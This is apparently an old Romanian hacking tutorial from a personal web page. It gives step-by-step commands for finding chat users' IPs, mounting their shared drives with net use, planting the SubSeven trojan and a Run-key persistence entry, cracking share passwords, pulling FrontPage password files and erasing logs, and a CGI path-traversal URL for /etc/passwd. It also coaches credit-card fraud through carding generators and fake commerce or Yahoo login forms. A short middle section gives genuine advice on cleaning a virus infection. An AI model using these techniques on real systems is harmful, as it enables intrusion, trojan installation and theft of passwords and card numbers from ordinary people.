Cu ajutorul programului ftp nu se pot lansa comenzi pe serverul gazda,dar
se pot afla comenzile disponibile pe server care pot fi executate cu telnetul.


Tastez ftp
open ftp.nebunu.home.ro
username:nebunu
password:*******************
user nebunu logged in
tastez "remotehelp" la promptul ftp ce apare si voi primi ca raspuns o serie de comenzi
ce pot fi executate pe computerul gazda
una dintre comenzile cele mai folositoare este "syst"
Copiez cu grija toate comenzile disponibile iar apoi tastez "quit"


Lansez apoi o sesiune telnet pe portul corespunzator ftp-ului si anume 21

Tastez telnet nebunu.home.ro 21 in submeniul run al meniului start

Voi primi un mesaj de intampinare din partea daemonului care ruleaza pe portul 21.
tastez
user nebunu
pass ***************(parola mea)
iar apoi pot da comenzile necesare printre care si "syst"
Tastez "quit"


Informatii folositoare pot obtine conectandu-ma pe portul 80 care automat este deschis

telnet nebunu.home.ro 80 

tastez urmatoarele comenzi:(puteti sa le incercati)
get /http/1.1 (pentru a vedea sursa paginii principale)
put fisier.htm /http/1.1 (pentru a incarca ceva pe server,in cazul asta nu merge)
Se poate tasta orice comanda cum ar fi "blablabla" urmata de doua apasari succesive
rapide ale tastei Enter,iar raspunsul va fi

bad request
server:numele sistemului de operare

Dar de ce trebuie sa cunosc sistemul de operare al gazdei?.Aceasta este cea mai obisnuita
intrebare care mi se pune si eu o gasesc fireasca.
Raspuns:Pentru a putea plasa un exploit trebuie sa cunosc sistemul de operare pentru care
acesta ruleaza la parametrii normali.Un exploit scris in limbaj de comanda Linux(bash)
(asemanator cu fisierele bat din DOS) evident nu poate rula pe un server care foloseste
o versiune de Windows(probabil NT).O alta explicatie:Daca cunoastem sistemul de operare
respectiv putem sa gasim un bug in CGI(common gateway interface).De exemplu pentru un server
pe care ruleaza MultiHTML 2.0 un bug ar fi tastarea in browser a urmatoarei comenzi:

http://www.server.com/cgi-bin/multihtml.pl?multi=/etc/passwd%00html 

Aceasta are ca rezultat obtinerea fisierului cu parola mult ravnita.Sa studiem putin comanda.
multihtml.pl este un program scris in Perl a carei executie are ca rezultat redarea fisierului
cerut cu extensia htm.Dar ce se intampla daca cer alt fisier?.Parametrul pe care-l dau
progamului este /etc/passwd(fisierul cu parola).%00htm inseamna ca nu are extensia htm.
%00 este caracterul NULL in limbajul Perl.Exemplele ar putea continua la nesfarsit dar
un hacker trebuie sa invate si singur nu numai sa copieze de la altii.
Sunt o multime de comenzi unix pe care le puteti incerca daca va faceti cont la nether.net.



Am primit de asemenea foarte multe intrebari despre mailbombing.
Mailbombingul este o tehnica folosita de lameri pentru a va umple casuta postala cu mesaje
insultatoare si repetate.Am inclus in pagina mea un program de mailbombing scris in javascript
cu ajutorul caruia puteti trimite 1000000 de mesaje in casuta postala a cuiva.
Acest program este inclus doar pentru a vedea cum functioneaza,eventual il puteti incerca
pe casuta dvs postala dar daca il folositi pe casuta postala a altcuiva,adresa dvs de mail
este vizibila si va puteti pierde contul de internet deoarece mailbombingul este ilegal.
program de mailbombing


De asemenea nu prea se stie cum se executa un exploit pe un calculator gazda.
Raspuns:fie cu ajutorul telnetului dupa ce a fost instalat cu ajutorul ftp-ului
fie cu ajutorul unui client ftp for windows care permite lansarea de aplicatii pe
calculatorul gazda.

Toate programele mentionarte le gasiti folsind motorul de cautare in care tastati numele programului.
Vom folosi niste programe de hack pe care le aveti in windows si nici nu stiti de ele.
Puteti lua IP-ul cuiva cu ajutorul comenzii dos c:/windows/tracert -j www.numeserver.
Incercati cu c:/windows/tracert -j www.nebunu.home.ro pentru a afla ip-ul meu.
Comanda c:/windows/nbtstat -n va va lista toate numele de utilizator din calculatorul dvs iar
c:/windows/nbtstat -n www.numeserver va face acelasi lucru cu www.numeserver sau cu IP-ul 
persoanei dorite cum ar fi c:/windows/nbtstat -n 193.148.458.934.
Sa trecem acum la niste smecherii pe care le puteti face pe chat-uri unde sunt toti fraierii.
(rog pe Cristi si Edi sa nu se supere pe mine,ei nu fac parte din aceasta categorie.)
Presupunem ca un calculator are optiunea "file and print sharing" din optiunea "network"
care se gaseste in "control panel" activata.
Pentru a scana gazdele vulnerabile folositi programul Legion sau Nbtscan.
Daca este asa atunci putem face ce vrem cu calculatorul acelui lamer.Voi intrati pe chat cu
programul Mirc.Tastati "dns/nickname" pentru a-i la IP-ul apoi urmati succesiunea de comenzi:

c:/windows/nbtstat -n IP {IP este adresa de ip a lamerului}
Dupa aceasta comanda aflati probabil si numele computerului acelui nefericit.Presupunem ca numele
este nebunu(nu,nu incercati la mine,eu nu intru pe chat-uri -:)
Tastati "c:/windows/net use f:\IPnebunu" si aveti acces la discul f al fraierului!.
Sa explicam aceasta comanda:
Programul net.exe se gaseste in directorul windows al utilizatorilor de windows 95.
IP-adresa lui de ip.
f-poate sa fie si c: sau d: ,reprezinta discul la care dorim sa avem acces.
nebunu-numele computerului pe care-l aflati cu "c:/winldows/nbtstat -n IP"

Sa instalam acum un troian cum ar fi Subseven pe calculatorul lamerului.
Dupa ce dati comanda "c:/windows/net use f:\IPnebunu" copiati fisieul "server.exe" pe f:
"copy server.exe f:" apoi il executati "f:/server.exe".
Daca nu are "file and print sharing" disabled si este utilizator de windows NT atunci puteti crea
un disc virtual x: pe care sa puneti troianul.
"net use x:\IPtmpparola_dorita/user:ntwak0
"net copy server.exe"

Va rog mult sa cititi acest articol pana la capat,deoarece valoreaza mult mai mult decat celelalte dupa parerea mea.

Din pacate acolo unde exista intelepti exista si nebuni,oameni care fac rau numai din placerea de a face,fara nici un interes material sau de alta natura.Categoria mentionata este mare,eu o sa mentionez numai un exemplu,un incident nefericit.Putin inainte de a scrie acest articol,mai precis cu o zi inainte,am folosit motorul de cautare de la www.top100.ro pentru a descarca un program.Dupa aspectul dubios al site-ului mi-am dat seama imediat ca am de-a face cu un virus,dar mi-am pus nadejdea in masurile de securitate excelente pe care le am impotriva oricarui tip de atac.Asa ca am descarcat programul si l-am rulat.Antivirusul nu a dat nici un semn de viata.Mi-am contnuat lucrul mai departe.Nimic.Poate m-am inselat,mi-am zis.Am inchis computerul si m-am culcat.A doua zi i-am dat drumul.Dezastru.Ecran negru.Hardul putea sa faca concurenta celui mai nenorocit tractor african.Am intrat pe Safe Mode.Acelasi lucru.Am intrat in binecuvantatul sistem de operare MSDOS,pe care nu il voi mai critica niciodata.Am vrut sa vad continutul fisierelor "win.ini","system.ini","autoexec.bat".Am gasit ceea ce cautam.In fisierul "system.ini" la linia "shell" era ceva de genul:

shell=Explorer.exe gkgflllgg.exe

Am sters toata linia pana la semnul egal.Am cautat programul gkgfllgg.exe si l-am sters.Nici un rezultat.Dupa doua ore de investigatii si dupa ce mi-am epuizat toata gama de injuraturi am izolat toate fisierele infectate si le-am sters.Nimic.Nu puteam sa intru in Windows deci nu aveam acces la registrii.Am reinstalat Windowsul dar am pierdut 100MB de pe hard plus niste informatii pe care nu doream sa le pierd.De aceea vreau sa va dau cateva sfaturi foarte utile privind propria securitate pe Net.

1)Nu va incredeti in nici un antivirus indiferent de upgrade,zilnic apar peste 12000 virusi din ce in ce mai "duri'.

2)Nu descarcati nici un program de carding,hack,nuke,dial-up de pe site-urile romanesti prezente in top100.Nici nu merita sa vizionati acele site-uri care va promit orice fara nici un efort.Daca totusi o faceti,inspectati cu atentie site-ul.Daca nu mai contine link-uri la alte pagini,adrese de mail sau explicatii plauzibile,daca conditioneaza vizionarea lor de votul dvs in top100 plecati imediat.

3)Cei care promoveaza site-uri ilegale,pornografice,in care se gasesc numere de carti de credit si alte dracii ,si va ofera programe cu pretentia ca puteti rezolva orice problema cu ele se inseala iar dvs sunteti cei pacaliti.

4)Programele care pretind ca listeaza toate conturile celor conectati la internet numai introducand IP-ul serverului sunt virusi sau troieni.Exemple de astfel de programe virusate,incarate de mine din simpla curiozitate pentrua vedea pana unde merge magaria, prostia si lipsa de judecata a unora sunt:Iris.exe,dial_up_sniffer.exe,infiltrator.exe.Aceste programe sunt gazduite de siteuri formate dintr-o singura pagina si care au foarte multe voturi in top100.Singura pagina in care am incredere prezenta in top100 se afla la www.ender2000.home.ro 

 

Studiind comportamentul acestui virus,cat si a altora am ajuns la concluzia ca majoritatea acestor programe odata rulate creeaza din corpul lor alte fisiere in directorul Windows sau System iar apoi creeaza intrari in registrii.De aceea se impune o monitorizare atenta a modificarilor continutului unui director.Dupa acest incident m-am hotarat sa creez un astfel de program de monitorizare care sa ruleze atat sub Windows cat si sub Dos.Sper sa fie gata pana pe 14 ianuarie 2000 si sa fie pus la dispozitia dumneavoastra cu tot cu cod sursa.

Cand rulati un program si apare o caseta de dialog de genul "cannot find blabla.dll" sunt 90% sanse sa fie virus.Nu iesiti din windows,stergeti linia "shell" din "system.ini",sa ramana ceva de genul "shell=Explorer.exe",stregeti toata linia "run" din fisierul "win.ini",sa ramana numai "run=",afisati continutul fisierului "autoexec.bat" si inspectati continutul apoi vedeti calea "c:/windows/start menu/programs/startup" si stregeti tot ce va pare suspect,adica ce nu ati avut inainte.Apoi tastati "regedit" si stregeti CLSID-urile suspecte,o sa scriu un tutorial despre registrii cat de curand.

Un hacker adevarat nu distruge nimic atunci cand reuseste sa patrunda intr-o retea ci foloseste in interes propriu toate informatiile sustrase.Am intalnit lameri nenorociti care formateaza hardul computerului in care reusec sa patrunda cu ajutorul programului Legion sau a altor programe de acest gen.Asta denota lipsa de materie canusie,nu-si imagineaza ca pot sa tina computerul respectiv sub control timp indelungat si sa sustraga in timp toate informaiile.

PENTRU A SATISFACE CURIOZITATEA UNORA DINTRE VOI PRECUM SI CU SCOP INFORMATIV. Bineinteles teoria exploiturilor functioneaza de minune: 1)SUSTRAGEREA NUMARULUI CARDULUI DIN CALCULATORUL ALTEI PERSOANE. Este cea mai utilizata metoda si functioneaza asupra calculatoarelor cu windows instalat.Exploitul este scanarea pe portul 139 a acelor calculatoare care au optiunea "file ad print sharing" activa.Tot ce are de facut un hacker este sa scaneze IP-urile pe o anumita raza de exemplu 4.37.1.1-4.38.1.255 iar apoi sa urmeze instructiunile din tutorialul pe care l-am dedicat hackeririi windowsului 2)FOLOSIREA UNUI PROGRAM DE CARDING Programele de acest tip extrapoleaza un numar valabil si generaza alte carti de credit valabile sau pur si simplu genereaza numere de carti de credit.Cele mai utilizate tipuri de carduri sunt:mastercard,visa,american express.Un program interesant este Card Wizard.Mod de folosire: Deschideti un site porno cum ar fi www.thehun.com ,cautati o pagina care contine posibilitatea de a introduce un numar de card,deschideti Card Wizard-ul odata cu pagina si incercati.Cit mai multe incercari cit mai multe sanse -;) 3)FORUM EXPLOIT,ECRANE FALSE,MAIL EXPLOIT Guestbook-ul de la www.ender2000.home.ro si orice guestbook in general poate fifolosit in astfel de scopuri. -afiliati-va unui astfel de guestbook -studiati foarte bine formularul -modificati acest formular -redirectati informatia introdusa spre alt site pentru a nu fi vazut -initial modificati formularul prezentindu-l ca fiind formularul unui site comercial....... *Cumparati un domeniu in care sa aveti acces la cgi-bin sau cgi-win construiti-va un fals site comercial care sa para veridic apoi scrieti un script care va pune numarul cartii de credit introduse de lamer intr-un fisier text. *Un exemplu sugestiv de ecran care poate fi falsificat este cel de la yahoo. Il puteti incarca si modifica.Modificati de fapt sursa paginii,adica numai partea de 
Vedeti sursa programului meu de mailbombing?Modificati-l incat sa trimita prin posta de mail numere de credit in loc de mesaje. *Urmariti cu ajutorul unui program de detectare informatia transmisa de pe un site comercial apoi puteti ataca calculatarele care primesc aceasta informatie. Ca sa puteti vedea modul de transmitere a informatiei de pe un calculator pe altul folositi comanda : c:/windows>tracert www.andre.ro si veti vedea toate calculatoarele prin care trece semnalul inainte de a ajunge pe serverul andre.ro 4)EXPLOITURI IN PROGRAMELE DE CARDING Deschideti un site comercial,introduceti un numar fals apoi urmariti cu atentie adresa din browser ,un exemplu ar fi www.sitecomercial.com/cgi-bin/cards/user?1456325789652314 apoi gasiti o modalitate de a fenta autentificarea.Spre exemplu am dezasamblat programul card32.exe si nu mica mi-a fost mirarea cand am descoperit o parola implicita "whoami". Sfatul meu este sa va luati programul w32dasm ,sa dezasamblati programele care va intereseaza si sa le intelegeti structura interna.Am dat de fapt un exemplu in tutorialul in care am crack-uit notepad.exe si winzip.exe. Daca dezasamblati troianul SubSeven veti descoperi o parola in limba romana care este pi.. a ;).

CA SA HACKERITI CU SUCCES UN SERVER TREBUE SA AVETI ACELASI SISTEM DE OPERARE!!!!!!!

Continut:

1)Hackeriti serverul de la distanta

2)Hackeriti paginile Web gazduite de acesta

3)Infiltrati troieni peun calculator pe care aveti acces(cum ar fi calculatorul scolii).

 

11)In tutorialul precedent a fost prezentata o mare vulnerabilitate a windowsului si anume optiunea "file and print sharing".Programele necesare sunt nbtstat.exe(il aveti deja),net.exe(probabil il aveti si pe acesta) si nat.exe.Deoarece stiti deja ce face nbtstatul trcecem la celelalte doua programe.In exemplul nostru presupunem ca serverul are IP-ul 123.123.123.123. iar numele este server.com .IP-ul se poate afla cu ajutorul comenzii "tracert -j www.server.com."Apoi se foloseste comanda "nbtstat -A 123.123.123.123. "Iata rezultatul acestei comenzi:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Student1 este numele computerului.Apoi dupa ce am aflat aceasta informatie tastam:

C:>net view 123.123.123.123
C:>net view \student1

Shared resources at 123.123.123.123


Share name Type Used as Comment

------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.

Asa aflam daca optiunea "file and print sharing este" activata.Apoi tastam urmatoarea comanda:

C:net use x: \123.123.123.123test
The command completed successfully.

Acum sa accesam noul disc creat si anume X:

C:net use
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK X: \123.123.123.123test Microsoft Windows Network
OK \123.123.123.123test Microsoft Windows Network
The command completed successfully.


In mod normal cand gasim un calculator cu "file and print sharing" ni se cere o parola.Aceata parola o putem sparge cu ajutorul programului PQwak.exe.Rulati-l,completati formularul si apoi asteptati.Nu trebuie sa asteptati prea mult.

Acum sa prezentam programul Nat.exe,foarte preferat de hackeri.Iata optiunile acestuia:

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

OPTIONS
-o Specifica fisierul in care se vor depune rezultatele scanarii unei "raze" de IP.
-u Specifica fisierul care contine numele de utilizatori(useri)
-p Specifica fisierul care contine parolele(password)
<address>
raza de IP care trebuie scanata.Iata un exempu.


C:nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30


Chiar daca nu "sparge" parola,totusi gaseste calculatoarele cu "file and print sharing" ceea ce este acelasi lucru pentu ca folosim programul PQwak.


2)Acesta este o lista care contine fisiere importante de pe server in relatie cu discul c:/ adica adresa fizica.

C:InetPubwwwroot <Home>
C:InetPubscripts /Scripts
C:InetPubwwwroot_vti_bin /_vti_bin
C:InetPubwwwroot_vti_bin_vti_adm /_vti_bin/_vti_adm
C:InetPubwwwroot_vti_bin_vti_aut /_vti_bin/_vti_aut
C:InetPubcgi-bin /cgi-bin
C:InetPubwwwrootsrchadm /srchadm
C:WINNTSystem32inetserviisadmin /iisadmin
C:InetPubwwwroot_vti_pvt 
C:InetPubwwwrootsamplesSearchQUERYHIT.HTM Internet Information Index Server sample
C:Program FilesMicrosoft FrontPage_vti_bin
C:Program FilesMicrosoft FrontPage_vti_bin_vti_aut
C:Program FilesMicrosoft FrontPage_vti_bin_vti_adm
C:WINNTSystem32inetserviisadminhtmldocsadmin.htm /iisadmin/isadmin

Stiind aceste lucruri putem hackeri serverul via html(adica putem schimba paginile web).Intai trebuie sa testam cu ajutorul telnetului existenta acestor "rute".

c:/windows>telnet 123.123.123.212 80(telnet pe serverul cu adresa 123.123.123.123 pe portul 80) si dam comenzile:

GET /_vti_inf.html -------ne asiguram ca este instalat frontpage

GET /_vti_pvt/service.pwd-------ne asiguram daca exista un fisier cu parola

GET /_vti_pvt/authors.pwd ----numai pentru servere Netscape(contine parola si userul criptate)-folositi "john the ripper"

GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log -----dupa ce patrundem pe server acest fisier trebuie sters sau schimbat deoarece contine adresa voastra IP

Deschidem Frontpage Explorer sau Frontage Express (pentru Windows 95) ,optiunea OPEN si selectam pagina dorita aflata la distanta http:// (restul completam noi).Puteti incerca asa cu pagina mea,completind in rubrica "location" http://www.nebunu.home.ro.Evident vi se va cere parola dar Windows NT este foarte vulnerabil.Pagina mea de la home.ro nu se afla gazduita peun server sub Windows,asa ca nu ncercati numic,v-ati putea pierde contul de NET ;).

 

3)Un troian este un program cu ajutorul caruia puteti patrunde pe calculatorul altei persoane.Un asemenea program este compus din doua fisiere executabile(server.exe si client.exe.).Server.exe trebuie rulat pe calculatorul fraierului iar cu ajutorul programului client.exe va conectati.Daca aveti acces la un calculator trebuie sa instalati programul astfel incat sa fie rulat la butarea calculatorului.E mai smplu decat sa astepti sa-l ruleze cineva.Voi da doua metode:

"1" Il introduceti in calea de startup.Pentru Windows95/98 calea este c/windows/start menu/programs/startup/server.exe.

"2" Cred ca aceasta metoda este buna pentru orice fel de Windows.Creati fisierul "fisier.reg" in care scrieti secventa urmatoare:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nebunu"="server.exe"

apoi il executati.Ca urmare a acestei executii se modifica registrii windowsului.Incercati cu alt program inofensiv cum ar fi notepad.exe.

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nebunu"="notepad.exe"


:rotfl:

* WeLeD (brenden2k@89.1.215.253.dynamic.barak-online.net)
Noi dam asa sa ii aflam ip-ul desi el se vede :

/dns 89.1.215.253.dynamic.barak-online.net
* Dns resolving 89.1.215.253.dynamic.barak-online.net
-
* Dns resolved 89.1.215.253.dynamic.barak-online.net to 89.1.215.253